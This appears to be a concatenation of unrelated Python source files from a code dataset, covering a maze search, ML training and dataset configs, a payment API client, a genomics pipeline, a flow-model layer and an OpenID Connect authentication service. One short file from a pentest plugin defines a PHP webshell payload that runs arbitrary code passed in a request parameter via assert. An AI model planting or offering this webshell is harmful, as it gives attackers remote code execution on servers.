n, m, q = len(maze), len(maze[0]), [(start[0], start[1])]
visit = [[-1 for _ in range(m)] for _ in range(n)]
visit[start[0]][start[1]] = 0
d = [(1, 0), (-1, 0), (0, 1), (0, -1)]
while q:
x, y = q[0][0], q[0][1]
q.pop(0)
for ii, jj in d:
i, j, cnt = x + ii, y + jj, 1
while 0 <= i < n and 0 <= j < m and maze[i][j] == 0:
i, j = i + ii, j + jj
cnt += 1
i, j = i - ii, j - jj
cnt -= 1
if visit[i][j] == -1 or visit[i][j] > visit[x][y] + cnt:
visit[i][j] = visit[x][y] + cnt
q.append((i, j))
return visit[destination[0]][destination[1]]
| 3.4375 | 3 |
core/argo/core/TrainingLauncher.py | szokejokepu/natural-rws | 0 | 12760294 | from .ArgoLauncher import ArgoLauncher
import pdb
class TrainingLauncher(ArgoLauncher):
def execute(self, model, opts, **kwargs):
model.train()
def initialize(self, model, dataset, config):
super().initialize(model,dataset, config)
model.create_session(config) | 2.375 | 2 |
models.py | tomaszpienta/Evolutionary-hyperparameter-selection-in-deep-neural-networks- | 0 | 12760295 | '''DATALOADERS'''
def LoadModel(name):
# print(name)
# classes = []
# D = 0
# H = 0
# W = 0
# Height = 0
# Width = 0
# Bands = 0
# samples = 0
if name == 'PaviaU':
classes = []
#Size of 3D images
D = 610
H = 340
W = 103
#Size of patches
Height = 27
Width = 21
Bands = 103
samples = 2400
patch = 300000
elif name == 'IndianPines':
classes = ["Undefined", "Alfalfa", "Corn-notill", "Corn-mintill",
"Corn", "Grass-pasture", "Grass-trees",
"Grass-pasture-mowed", "Hay-windrowed", "Oats",
"Soybean-notill", "Soybean-mintill", "Soybean-clean",
"Wheat", "Woods", "Buildings-Grass-Trees-Drives",
"Stone-Steel-Towers"]
#Size of 3D images
D = 145
H = 145
W = 200
#Size of patches
# Height = 17
# Width = 17
Height = 19
Width = 17
Bands = 200
samples = 4000
patch = 300000
elif name == 'Botswana':
classes = ["Undefined", "Water", "Hippo grass",
"Floodplain grasses 1", "Floodplain grasses 2",
"Reeds", "Riparian", "Firescar", "Island interior",
"Acacia woodlands", "Acacia shrublands",
"Acacia grasslands", "Short mopane", "Mixed mopane",
"Exposed soils"]
#Size of 3D images
D = 1476
H = 256
W = 145
#Size of patches
Height = 31
Width = 21
Bands = 145
samples = 1500
patch = 30000
elif name == 'KSC':
classes = ["Undefined", "Scrub", "Willow swamp",
"Cabbage palm hammock", "Cabbage palm/oak hammock",
"Slash pine", "Oak/broadleaf hammock",
"Hardwood swamp", "Graminoid marsh", "Spartina marsh",
"Cattail marsh", "Salt marsh", "Mud flats", "Wate"]
#Size of 3D images
D = 512
H = 614
W = 176
#Size of patches
Height = 31
Width = 27
Bands = 176
samples = 2400
patch = 30000
elif name == 'Salinas':
classes = []
#Size of 3D images
D = 512
H = 217
W = 204
#Size of patches
Height = 21
Width = 17
Bands = 204
samples = 2600
patch = 300000
elif name == 'SalinasA':
classes = []
#Size of 3D images
D = 83
H = 86
W = 204
#Size of patches
Height = 15
Width = 11
Bands = 204
samples = 2400
patch = 300000
elif name == 'Samson':
classes = []
#Size of 3D images
D = 95
H = 95
W = 156
#Size of patches
Height = 10
Width = 10
Bands = 156
samples = 1200
patch = 30000
return Width, Height, Bands, samples, D, H, W, classes, patch
| 2.265625 | 2 |
pyrave/preauth.py | Olamyy/pyrave | 11 | 12760296 | from pyrave.base import BaseRaveAPI
from pyrave.encryption import RaveEncryption
class Preauth(BaseRaveAPI):
"""
Preauthorization Class
"""
def __init__(self):
super(Preauth, self).__init__()
self.rave_enc = RaveEncryption()
def preauthorise_card(self, log_url=False, **kwargs):
"""
:param log_url:
:param client:
:param algo:
:return:
"""
encrypted_data = self.rave_enc.encrypt(preauthorised=True, **kwargs)
if not encrypted_data:
return encrypted_data
request_data = {
"PBFPubKey": self.secret_key,
"client": encrypted_data[1],
"algo": encrypted_data[2]
}
url = self.rave_url_map.get("payment_endpoint") + "charge"
return self._exec_request("POST", url, request_data, log_url=log_url)
def capture_preauthorised_transaction(self, transaction_reference, log_url=False):
"""
:param log_url:
:param transaction_reference:
:return:
"""
request_data = {
"SECKEY": self.secret_key,
"flwRef": transaction_reference,
}
url = self.rave_url_map.get("payment_endpoint") + "capture"
return self._exec_request("POST", url, request_data, log_url=log_url)
def refund_or_void_transaction(self, action, reference_id, log_url=False):
"""
:param log_url:
:param action:
:param reference_id:
:return:
"""
request_data = {
"ref": reference_id,
"action": action,
"SECKEY": self.secret_key
}
url = self.rave_url_map.get("payment_endpoint") + "refundorvoid"
return self._exec_request("POST", url, request_data, log_url=log_url)
def refund(self, reference_id, log_url=False):
request_data = {
"ref": reference_id,
"seckey": self.secret_key
}
url = self.rave_url_map.get("merchant_refund_endpoint")
return self._exec_request("POST", url, request_data, log_url=log_url)
| 2.3125 | 2 |
obsolete/pipeline_polyphen.py | kevinrue/cgat-flow | 11 | 12760297 | <reponame>kevinrue/cgat-flow<gh_stars>10-100
"""
Polyphen prediction pipeline
=============================
:Author: <NAME>
:Release: $Id: pipeline_snps.py 2870 2010-03-03 10:20:29Z andreas $
:Date: |today|
:Tags: Python
Purpose
-------
Input:
Indels in pileup format.
Usage
-----
Type::
python <script_name>.py --help
for command line help.
Code
----
"""
from ruffus import *
import sys
import glob
import os
import itertools
import sqlite3
import cgatcore.experiment as E
from cgatcore import pipeline as P
import pipelineGeneset as PGeneset
###################################################################
###################################################################
###################################################################
# read global options from configuration file
P.getParameters(
["%s/pipeline.ini" % os.path.splitext(__file__)[0],
"../pipeline.ini",
"pipeline.ini"],
defaults={'polyphen_modes': ""})
P.PARAMS.update(
{"transcripts": "transcripts.gtf.gz",
"genes": 'genes.gtf.gz',
"annotation": 'geneset_regions.gff.gz',
"peptides": 'peptides.fasta',
"cdna": 'cdna.fasta',
"cds": 'cds.fasta'})
PARAMS = P.PARAMS
PGeneset.PARAMS = PARAMS
SEPARATOR = "|"
###################################################################
###################################################################
###################################################################
# gene set section
############################################################
############################################################
############################################################
@files(PARAMS["ensembl_filename_gtf"], PARAMS['annotation'])
def buildGeneRegions(infile, outfile):
'''annotate genomic regions with reference gene set.
Only considers protein coding genes. In case of overlapping
genes, only take the longest (in genomic coordinates).
Genes not on UCSC contigs are removed.
'''
PGeneset.buildGeneRegions(infile, outfile)
############################################################
############################################################
############################################################
@follows(buildGeneRegions)
@files(PARAMS["ensembl_filename_gtf"], PARAMS['genes'])
def buildGenes(infile, outfile):
'''build a collection of exons from the protein-coding
section of the ENSEMBL gene set. The exons include both CDS
and UTR.
The set is filtered in the same way as in :meth:`buildGeneRegions`.
'''
PGeneset.buildProteinCodingGenes(infile, outfile)
############################################################
############################################################
############################################################
@files(PARAMS["ensembl_filename_gtf"], "gene_info.load")
def loadGeneInformation(infile, outfile):
'''load the transcript set.'''
PGeneset.loadGeneInformation(infile, outfile)
############################################################
############################################################
############################################################
@files(buildGenes, "gene_stats.load")
def loadGeneStats(infile, outfile):
'''load the transcript set.'''
PGeneset.loadGeneStats(infile, outfile)
############################################################
############################################################
############################################################
@files(PARAMS["ensembl_filename_gtf"], PARAMS["transcripts"])
def buildTranscripts(infile, outfile):
'''build a collection of transcripts from the protein-coding
section of the ENSEMBL gene set.
Only CDS are used.
'''
PGeneset.buildProteinCodingTranscripts(infile, outfile)
############################################################
############################################################
############################################################
@transform(buildTranscripts, suffix(".gtf.gz"), "_gtf.load")
def loadTranscripts(infile, outfile):
'''load the transcript set.'''
PGeneset.loadTranscripts(infile, outfile)
############################################################
############################################################
############################################################
@files(buildTranscripts, "transcript_stats.load")
def loadTranscriptStats(infile, outfile):
'''load the transcript set.'''
PGeneset.loadTranscriptStats(infile, outfile)
############################################################
############################################################
############################################################
@files(PARAMS["ensembl_filename_gtf"], "transcript_info.load")
def loadTranscriptInformation(infile, outfile):
'''load the transcript set.'''
PGeneset.loadTranscriptInformation(infile,
outfile,
only_proteincoding=PARAMS["ensembl_only_proteincoding"])
###################################################################
###################################################################
###################################################################
@files(((PARAMS["ensembl_filename_pep"], PARAMS["peptides"]), ))
def buildPeptideFasta(infile, outfile):
'''load ENSEMBL peptide file
*infile* is an ENSEMBL .pep.all.fa.gz file.
'''
PGeneset.buildPeptideFasta(infile, outfile)
###################################################################
###################################################################
###################################################################
@files(((PARAMS["ensembl_filename_cdna"], PARAMS["cdna"]), ))
def buildCDNAFasta(infile, outfile):
'''load ENSEMBL peptide file
*infile* is an ENSEMBL .cdna.all.fa.gz file.
'''
PGeneset.buildCDNAFasta(infile, outfile)
###################################################################
###################################################################
###################################################################
@follows(loadTranscriptInformation)
@files([(PARAMS["transcripts"], PARAMS["cds"]), ])
def buildCDSFasta(infile, outfile):
'''build cds sequences from peptide and cds file.
*infile* is an ENSEMBL .cdna.all.fa.gz file.
'''
PGeneset.buildCDSFasta(infile, outfile)
############################################################
############################################################
############################################################
@files(PARAMS["ensembl_filename_pep"], "protein_stats.load")
def loadProteinStats(infile, outfile):
'''load the transcript set.'''
PGeneset.loadProteinStats(infile, outfile)
############################################################
############################################################
############################################################
@files(((None, "benchmark.ids"), ))
def buildBenchmarkSet(infile, outfile):
'''build a benchmark set of protein ids.'''
pass
############################################################
############################################################
############################################################
@files(((buildBenchmarkSet, "benchmark.input"),))
def buildBenchmarkInput(infile, outfile):
tmpfile = P.getTempFile()
dbhandle = sqlite3.connect(PARAMS["database_name"])
cc = dbhandle.cursor()
statement = '''
SELECT DISTINCT transcript_id, protein_id FROM peptide_info
'''
cc.execute(statement)
tmpfile.write("transcript_id\tprotein_id\n")
tmpfile.write("\n".join(["\t".join(x) for x in cc]))
tmpfile.write("\n")
tmpfilename = tmpfile.name
statement = '''
perl %(scriptsdir)s/extract_fasta.pl %(infile)s
< cds.fasta
python %(scripstdir)s/fasta2variants.py --is-cds
| python %(scriptsdir)s/substitute_tokens.py
--map-tsv-file=%(tmpfilename)s
> %(outfile)s
'''
P.run()
os.unlink(tmpfilename)
###################################################################
###################################################################
###################################################################
@transform("*.input", suffix(".input"), ".features")
def buildPolyphenFeatures(infile, outfile):
'''run polyphen on the cluster.
To do this, first send uniref to all nodes:
python ~/cgat/cluster_distribute.py
--collection=andreas
/net/cpp-group/tools/polyphen-2.0.18/nrdb/uniref100*.{pin,psd,psi,phr,psq,pal}
'''
nsnps = len([x for x in open(infile)])
to_cluster = True
stepsize = max(int(nsnps / 200000.0), 1000)
job_array = (0, nsnps, stepsize)
E.info("running array jobs on %i snps" % nsnps)
scratchdir = os.path.join(os.path.abspath("."), "scratch")
try:
os.mkdir(scratchdir)
except OSError:
pass
resultsdir = outfile + ".dir"
try:
os.mkdir(resultsdir)
except OSError:
pass
statement = '''
/net/cpp-group/tools/polyphen-2.0.18/bin/run_pph_cpp.pl
-s %(peptides)s
-b %(polyphen_blastdb)s
-d %(scratchdir)s
%(infile)s > %(resultsdir)s/%(outfile)s.$SGE_TASK_ID 2> %(resultsdir)s/%(outfile)s.err.$SGE_TASK_ID
'''
P.run()
to_cluster = False
job_array = None
statement = '''find %(resultsdir)s -name "*.err.*" -exec cat {} \;
| gzip
> %(outfile)s.log.gz'''
P.run()
statement = '''find %(resultsdir)s -not -name "*.err.*" -exec cat {} \;
| gzip
> %(outfile)s'''
P.run()
###################################################################
###################################################################
###################################################################
@files([(x, "%s_%s.output.gz" % (x[:-len(".features.gz")], y), y)
for x, y in itertools.product(
glob.glob("*.features.gz"), P.asList(PARAMS["polyphen_models"]))])
def runPolyphen(infile, outfile, model):
'''run POLYPHEN on feature tables to classify SNPs.
'''
to_cluster = False
# need to run in chunks for large feature files
statement = """gunzip
< %(infile)s
| %(cmd-farm)s
--split-at-lines=10000
--output-header
"perl %(polyphen_home)s/bin/run_weka_cpp.pl
-l %(polyphen_home)s/models/%(model)s.UniRef100.NBd.f11.model
-p
%%STDIN%%"
| gzip > %(outfile)s
"""
P.run()
return
###################################################################
###################################################################
###################################################################
@transform(buildBenchmarkInput, suffix(".input"), ".load")
def loadPolyphenWeights(infile, outfile):
'''load polyphen input data.'''
table = "weights"
statement = '''
cat < %(infile)s
| python %(scriptsdir)s/csv_cut.py snpid counts weight
|python %(scriptsdir)s/csv2db.py %(csv2db_options)s
--add-index=snp_id
--table=%(table)s
> %(outfile)s
'''
P.run()
###################################################################
###################################################################
###################################################################
@transform(runPolyphen, suffix(".output.gz"), ".load")
def loadPolyphen(infile, outfile):
'''load polyphen results.
The comment column is ignored.
'''
table = P.toTable(outfile)
statement = '''gunzip
< %(infile)s
| perl -p -e "s/o_acc/protein_id/; s/ +//g"
| cut -f 1-55
|python %(scriptsdir)s/csv2db.py %(csv2db_options)s
--add-index=snp_id
--add-index=protein_id
--table=%(table)s
--map=effect:str
> %(outfile)s
'''
P.run()
@follows(loadTranscripts,
loadTranscriptInformation,
loadGeneStats,
loadGeneInformation,
buildPeptideFasta,
buildCDSFasta)
def prepare():
pass
if __name__ == "__main__":
sys.exit(P.main(sys.argv))
| 1.601563 | 2 |
malaya_speech/train/model/revsic_glowtts/flow/inv1x1conv.py | ishine/malaya-speech | 0 | 12760298 | <reponame>ishine/malaya-speech
"""
MIT License
Copyright (c) 2021 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from typing import Tuple
import tensorflow as tf
from malaya_speech.train.model.utils import shape_list
class Inv1x1Conv(tf.keras.Model):
"""Invertible 1x1 grouped convolution.
"""
def __init__(self, groups):
"""Initializer.
Args:
groups: int, size of the convolution groups.
"""
super(Inv1x1Conv, self).__init__()
self.groups = groups
# [groups, groups]
weight, _ = tf.linalg.qr(tf.random.normal([groups, groups]))
self.weight = tf.Variable(weight)
def transform(self, inputs: tf.Tensor, mask: tf.Tensor, weight: tf.Tensor) \
-> Tuple[tf.Tensor, tf.Tensor]:
"""Convolve inputs.
Args:
inputs: [tf.float32; [B, T, C]], input tensor.
mask: [tf.float32, [B, T]], sequence mask.
weight: [tf.float32; [G, G]], convolutional weight.
Returns:
outputs: [tf.float32; [B, T, C]], convolved tensor.
logdet: [tf.float32; [B]], log-determinant of conv2d derivation.
"""
# [B, T, C // G, G]
x = self.grouping(inputs)
# [B, T, C // G, G]
x = tf.nn.conv2d(x, weight[None, None], 1, padding='SAME')
# []
_, dlogdet = tf.linalg.slogdet(weight)
# [B]
dlogdet = dlogdet * tf.reduce_sum(mask, axis=-1) * \
tf.cast(tf.shape(x)[2], tf.float32)
# [B, T, C]
outputs = self.recover(x)
# [B, T, C], [B]
return outputs, dlogdet
def call(self, inputs: tf.Tensor, mask: tf.Tensor) \
-> Tuple[tf.Tensor, tf.Tensor]:
"""Forward 1x1 convolution.
Args:
inputs: [tf.float32; [B, T, C]], input tensor.
mask: [tf.float32, [B, T]], sequence mask.
Returns:
outputs: [tf.float32; [B, T, C]], convolved tensor.
logdet: [tf.float32; [B]], log-determinant of conv2d derivation.
"""
return self.transform(inputs, mask, self.weight)
def inverse(self, inputs: tf.Tensor, mask: tf.Tensor) \
-> Tuple[tf.Tensor, tf.Tensor]:
"""Inverse 1x1 convolution.
Args:
inputs: [tf.float32; [B, T, C]], input tensor.
mask: [tf.float32, [B, T]], sequence mask.
Returns:
outputs: [tf.float32; [B, T, C]], convolved tensor.
"""
outputs, _ = self.transform(inputs, mask, tf.linalg.inv(self.weight))
return outputs
def grouping(self, x: tf.Tensor) -> tf.Tensor:
"""Grouping tensor.
Args:
x: [tf.float32; [B, T, C]], input tensor.
return:
[tf.float32; [B, T, C // G, G]], grouped tensor.
"""
# B, T, C
bsize, timestep, channels = shape_list(x)
# [B, T, 2, C // G, G // 2]
x = tf.reshape(x, [bsize, timestep, 2, channels // self.groups, self.groups // 2])
# [B, T, C // G, 2, G // 2]
x = tf.transpose(x, [0, 1, 3, 2, 4])
# [B, T, C // G, G]
return tf.reshape(x, [bsize, timestep, channels // self.groups, self.groups])
def recover(self, x: tf.Tensor) -> tf.Tensor:
"""Recover grouped tensor.
Args:
x: [tf.float32; [B, T, C // G, G]], grouped tensor.
Returns:
[tf.float32; [B, T, C]], recovered.
"""
# B, T, C // G, G(=self.groups)
bsize, timestep, splits, _ = shape_list(x)
# [B, T, C // G, 2, G // 2]
x = tf.reshape(x, [bsize, timestep, splits, 2, self.groups // 2])
# [B, T, 2, C // G, G // 2]
x = tf.transpose(x, [0, 1, 3, 2, 4])
# [B, T, C]
return tf.reshape(x, [bsize, timestep, splits * self.groups])
| 1.804688 | 2 |
nagare/services/security/oidc_auth.py | nagareproject/services-security-oidc | 0 | 12760299 | # Encoding: utf-8
# --
# Copyright (c) 2008-2021 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
# --
import os
import time
import copy
import threading
from base64 import urlsafe_b64encode
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
import requests
from jwcrypto import jwk, jws
from jwcrypto.common import JWException
from python_jwt import _JWTError, generate_jwt, process_jwt, verify_jwt
from nagare import partial, log
from nagare.renderers import xml
from nagare.services.security import cookie_auth
class Login(xml.Component):
ACTION_PRIORITY = 5
def __init__(self, manager, renderer, scopes, location):
self.manager = manager
self.renderer = renderer
self.scopes = scopes
self.location = location
self._action = None
self.with_request = False
self.args = ()
self.kw = {}
@partial.max_number_of_args(2)
def action(self, action, args, with_request=False, **kw):
self._action = action
self.with_request = with_request
self.args = args
self.kw = kw
return self
def set_sync_action(self, action_id, params):
pass
def render(self, h):
if self._action is not None:
action_id, _ = self.renderer.register_callback(
self,
self.ACTION_PRIORITY,
self._action,
self.with_request, *self.args, **self.kw
)
else:
action_id = None
_, url, params, _ = self.manager.create_auth_request(
h.session_id, h.state_id, action_id,
h.request.create_redirect_url(self.location),
self.scopes
)
response = h.response
response.status_code = 307
response.headers['Location'] = url + '?' + urlencode(params)
return response
class Authentication(cookie_auth.Authentication):
LOAD_PRIORITY = cookie_auth.Authentication.LOAD_PRIORITY + 1
REQUIRED_ENDPOINTS = {'authorization_endpoint', 'token_endpoint'}
ENDPOINTS = REQUIRED_ENDPOINTS | {'discovery_endpoint', 'userinfo_endpoint', 'end_session_endpoint'}
EXCLUDED_CLAIMS = {'iss', 'aud', 'exp', 'iat', 'auth_time', 'nonce', 'acr', 'amr', 'azp'} | {'session_state', 'typ', 'nbf'}
CONFIG_SPEC = dict(
copy.deepcopy(cookie_auth.Authentication.CONFIG_SPEC),
host='string(default="localhost", help="server hostname")',
port='integer(default=None, help="server port")',
ssl='boolean(default=True, help="HTTPS protocol")',
proxy='string(default=None, help="HTTP/S proxy to use")',
verify='boolean(default=True, help="SSL certificate verification")',
timeout='integer(default=5, help="communication timeout")',
client_id='string(help="application identifier")',
client_secret='string(default="", help="application authentication")',
secure='boolean(default=True, help="JWT signature verification")',
algorithms='string_list(default=list({}), help="accepted signing/encryption algorithms")'.format(', '.join(jws.default_allowed_algs)),
key='string(default=None, help="cookie encoding key")',
jwks_uri='string(default=None, help="JWK keys set document")',
issuer='string(default=None, help="server identifier")'
)
CONFIG_SPEC['cookie']['activated'] = 'boolean(default=False)'
CONFIG_SPEC['cookie']['encrypt'] = 'boolean(default=False)'
CONFIG_SPEC.update({endpoint: 'string(default=None)' for endpoint in ENDPOINTS})
def __init__(
self,
name, dist,
client_id, client_secret='', secure=True, algorithms=jws.default_allowed_algs,
host='localhost', port=None, ssl=True, verify=True, timeout=5, proxy=None,
key=None, jwks_uri=None, issuer=None,
services_service=None,
**config
):
services_service(
super(Authentication, self).__init__, name, dist,
client_id=client_id, client_secret=client_secret, secure=secure, algorithms=algorithms,
host=host, port=port, ssl=ssl, verify=verify, timeout=timeout, proxy=proxy,
key=key, jwks_uri=jwks_uri, issuer=issuer,
**config
)
self.key = key or urlsafe_b64encode(os.urandom(32)).decode('ascii')
self.jwk_key = jwk.JWK(kty='oct', k=self.key)
self.timeout = timeout
self.client_id = client_id
self.client_secret = client_secret
self.secure = secure
self.algorithms = algorithms
self.verify = verify
self.proxies = {'http': proxy, 'https': proxy} if proxy else None
self.issuer = issuer
self.jwks_uri = jwks_uri
self.jwks_expiration = None
self.jwks_lock = threading.Lock()
self.signing_keys = jwk.JWKSet()
self.ident = name
if not port:
port = 443 if ssl else 80
endpoint_params = dict(
config,
scheme='https' if ssl else 'http',
host=host,
port=port,
base_url='{}://{}:{}'.format(('https' if ssl else 'http'), host, port)
)
self.endpoints = {endpoint: (config[endpoint] or '').format(**endpoint_params) for endpoint in self.ENDPOINTS}
def send_request(self, method, url, params=None, data=None):
r = requests.request(
method, url, params=params or {}, data=data or {},
verify=self.verify, timeout=self.timeout, proxies=self.proxies
)
r.raise_for_status()
return r
def create_discovery_request(self):
discovery_endpoint = self.endpoints['discovery_endpoint']
return (None, None, None, None) if discovery_endpoint is None else ('GET', discovery_endpoint, {}, {})
def create_auth_request(self, session_id, state_id, action_id, redirect_url, scopes=(), **params):
state = b'%d#%d#%s' % (session_id, state_id, (action_id or '').encode('ascii'))
params = dict({
'response_type': 'code',
'client_id': self.client_id,
'redirect_uri': redirect_url,
'scope': ' '.join({'openid'} | set(scopes)),
'access_type': 'offline',
'state': '#{}#{}'.format(self.ident, self.encrypt(state).decode('ascii'))
}, **params)
return 'GET', self.endpoints['authorization_endpoint'], params, {}
def create_token_request(self, redirect_url, code):
payload = {
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': redirect_url,
'client_id': self.client_id,
'client_secret': self.client_secret
}
return 'POST', self.endpoints['token_endpoint'], {}, payload
def create_refresh_token_request(self, refresh_token):
payload = {
'grant_type': 'refresh_token',
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': refresh_token
}
return 'POST', self.endpoints['token_endpoint'], {}, payload
def create_end_session_request(self, refresh_token):
payload = {
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': refresh_token
}
return 'POST', self.endpoints['end_session_endpoint'], {}, payload
def create_userinfo_request(self, access_token):
return 'POST', self.endpoints.get('userinfo_endpoint'), {}, {'access_token': access_token}
def fetch_keys(self):
if self.jwks_uri and self.jwks_expiration and (time.time() > self.jwks_expiration):
with self.jwks_lock:
logger = log.get_logger('.keys', self.logger)
certs = self.send_request('GET', self.jwks_uri)
new_keys = set(k['kid'] for k in certs.json()['keys'])
keys = {key.key_id for key in self.signing_keys['keys']}
if new_keys != keys:
logger.debug('New signing keys fetched: {} -> {}'.format(sorted(keys), sorted(new_keys)))
self.signing_keys = jwk.JWKSet.from_json(certs.text)
else:
logger.debug('Same signing keys fetched: {}'.format(sorted(keys)))
cache_controls = [v.split('=') for v in certs.headers['Cache-Control'].split(',') if '=' in v]
cache_controls = {k.strip(): v.strip() for k, v in cache_controls}
max_age = cache_controls.get('max-age')
if max_age and max_age.isdigit():
logger.debug('Signing keys max age: {}'.format(max_age))
self.jwks_expiration = time.time() + int(max_age)
else:
logger.debug('No expiration date for signing keys')
self.jwks_expiration = None
def handle_start(self, app, oidc_listener_service):
oidc_listener_service.register_service(self.ident, self)
method, url, params, data = self.create_discovery_request()
if url:
r = self.send_request(method, url, params, data).json()
self.issuer = r['issuer']
self.endpoints = {endpoint: r.get(endpoint) for endpoint in self.ENDPOINTS}
jwks_uri = r.get('jwks_uri')
if jwks_uri and not self.jwks_uri:
self.jwks_uri = jwks_uri
self.jwks_expiration = time.time() - 1
missing_endpoints = [endpoint for endpoint in self.REQUIRED_ENDPOINTS if not self.endpoints[endpoint]]
if missing_endpoints:
self.logger.error('Endpoints without values: ' + ', '.join(missing_endpoints))
self.fetch_keys()
def handle_request(self, chain, **params):
self.fetch_keys()
return super(Authentication, self).handle_request(chain, **params)
def validate_id_token(self, id_token):
audiences = set(id_token['aud'].split())
authorized_party = id_token.get('azp')
return (
(not self.issuer or id_token['iss'] == self.issuer) and
(self.client_id in audiences) and
((len(audiences) == 1) or (authorized_party is not None)) and
((authorized_party is None) or (self.client_id == authorized_party)) and
(id_token['exp'] > time.time())
)
def refresh_token(self, refresh_token):
method, url, params, data = self.create_refresh_token_request(refresh_token)
return self.send_request(method, url, params, data)
def is_auth_response(self, request):
code, session_id, state_id, action_id = None, 0, 0, ''
state = request.params.get('state', '')
code = request.params.get('code')
if code and state.startswith('#'):
state = state.rsplit('#', 1)[1]
try:
state = self.decrypt(state.encode('ascii')).decode('ascii')
session_id, state_id, action_id = state.split('#')
except cookie_auth.InvalidToken:
code = None
return code, int(session_id), int(state_id), action_id
def to_cookie(self, **credentials):
credentials = self.filter_credentials(credentials, {'sub'})
if self.encrypted:
cookie = super(Authentication, self).to_cookie(credentials.pop('sub'), **credentials)
else:
cookie = generate_jwt(credentials, self.jwk_key, 'HS256')
return cookie
def from_cookie(self, cookie, max_age):
if self.encrypted:
principal, credentials = super(Authentication, self).from_cookie(cookie, max_age)
credentials['sub'] = principal
else:
_, credentials = verify_jwt(cookie.decode('ascii'), self.jwk_key, ['HS256'], checks_optional=True)
credentials = self.filter_credentials(credentials, {'sub'})
return credentials['sub'], credentials
def retrieve_credentials(self, session):
if self.cookie or not session:
return None, {}
credentials = session.get('nagare.credentials', {})
return credentials.get('sub'), credentials
@staticmethod
def filter_credentials(credentials, to_keep):
return {k: v for k, v in credentials.items() if k in to_keep}
def store_credentials(self, session, credentials):
if not self.cookie and session:
session['nagare.credentials'] = self.filter_credentials(credentials, {'sub'})
def request_credentials(self, request, code, action_id):
credentials = {}
method, url, params, data = self.create_token_request(request.create_redirect_url(), code)
response = self.send_request(method, url, params, data)
if response.status_code == 400:
error = response.text
if response.headers.get('content-type') == 'application/json':
response = response.json()
if 'error' in response:
error = response['error']
description = response.get('error_description')
if description:
error += ': ' + description
self.logger.error(error)
elif response.status_code != 200:
self.logger.error('Authentication error')
else:
tokens = response.json()
id_token = tokens['id_token']
try:
headers, _ = process_jwt(id_token)
key = self.signing_keys.get_key(headers.get('kid'))
_, id_token = verify_jwt(id_token, key, self.algorithms if self.secure else None, checks_optional=True)
except (JWException, _JWTError) as e:
self.logger.error('Invalid id_token: ' + e.args[0])
else:
if not self.validate_id_token(id_token):
self.logger.error('Invalid id_token')
else:
credentials = dict(id_token, access_token=tokens['access_token'])
refresh_token = tokens.get('refresh_token')
if refresh_token is not None:
credentials['refresh_token'] = refresh_token
if action_id:
request.environ['QUERY_STRING'] = action_id + '='
return credentials
def get_principal(self, request, response, session, session_id, state_id, **params):
new_response = None
credentials = {}
code, _, _, action_id = self.is_auth_response(request)
if code:
credentials = self.request_credentials(request, code, action_id)
if credentials:
new_response = request.create_redirect_response(
response=response,
_s=session_id,
_c='%05d' % state_id
)
if not credentials:
principal, credentials = self.retrieve_credentials(session)
if not principal:
principal, credentials, r = super(Authentication, self).get_principal(
request=request, response=response,
**params
)
if credentials:
self.store_credentials(session, credentials)
return credentials.get('sub'), credentials, new_response
def login(self, h, scopes=(), location=None):
return Login(self, h, scopes, location)
def logout(self, location='', delete_session=True, user=None, access_token=None):
"""Disconnection of the current user
Mark the user object as expired
In:
- ``location`` -- location to redirect to
- ``delete_session`` -- is the session expired too?
"""
status = super(Authentication, self).logout(location, delete_session, user)
if access_token is not None:
method, url, params, data = self.create_end_session_request(access_token)
if url:
response = self.send_request(method, url, params, data)
status = status and (response.status_code == 204)
return status
def user_info(self, access_token):
method, url, params, data = self.create_userinfo_request(access_token)
if not url:
return {}
response = self.send_request(method, url, params, data)
return response.json() if response.status_code == 200 else {}
class AuthenticationWithDiscovery(Authentication):
CONFIG_SPEC = dict(
Authentication.CONFIG_SPEC,
discovery_endpoint='string(default="{base_url}/.well-known/openid-configuration")'
)
# ---------------------------------------------------------------------------------------------------------------------
class KeycloakAuthentication(Authentication):
CONFIG_SPEC = dict(
Authentication.CONFIG_SPEC,
realm='string',
discovery_endpoint='string(default="{base_url}/auth/realms/{realm}/.well-known/openid-configuration")'
)
class GoogleAuthentication(AuthenticationWithDiscovery):
CONFIG_SPEC = dict(
AuthenticationWithDiscovery.CONFIG_SPEC,
host='string(default="accounts.google.com")'
)
class AzureAuthentication(Authentication):
CONFIG_SPEC = dict(
AuthenticationWithDiscovery.CONFIG_SPEC,
host='string(default="login.microsoftonline.com")',
discovery_endpoint='string(default="{base_url}/{tenant}/v2.0/.well-known/openid-configuration")',
tenant='string(default="common")'
)
| 2.078125 | 2 |
plugins/beebeeto/utils/payload/webshell/php.py | aliluyala/PocHunter | 95 | 12760300 | #author: fyth
from webshell import *
class PhpShell(Webshell):
_password = '<PASSWORD>'
_content = "<?php var_dump(md5(123));@assert($_REQUEST['{0}']);?>"
_check_statement = 'var_dump(md5(123));'
_keyword = '202cb962ac59075b964b07152d234b70'
class PhpVerify(VerifyShell):
_content = "<?php var_dump(md5(123));unlink(__FILE__);?>"
_keyword = '202cb962ac59075b964b07152d234b70'
| 1.835938 | 2 |
main.py | cwormsl2/TraditionsChallenge | 0 | 12760301 | <filename>main.py
'''
Authors: <NAME>, <NAME>, <NAME>
Final Project for Advanced Web Programming at Ithaca College
Fall 2015
